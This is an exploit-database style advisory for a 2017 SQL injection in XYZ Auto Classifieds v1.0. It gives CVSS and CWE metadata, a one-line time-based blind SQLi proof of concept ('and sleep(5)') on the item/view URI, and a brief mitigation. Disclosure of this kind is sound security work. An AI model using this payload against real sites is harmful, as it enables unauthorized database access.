vendor:
XYZ Auto Classifieds
by:
8bitsec
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: XYZ Auto Classifieds
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:xyzscripts:xyz_auto_classifieds:1.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
XYZ Auto Classifieds v1.0 – SQL Injection
SQL injection on [view] URI parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.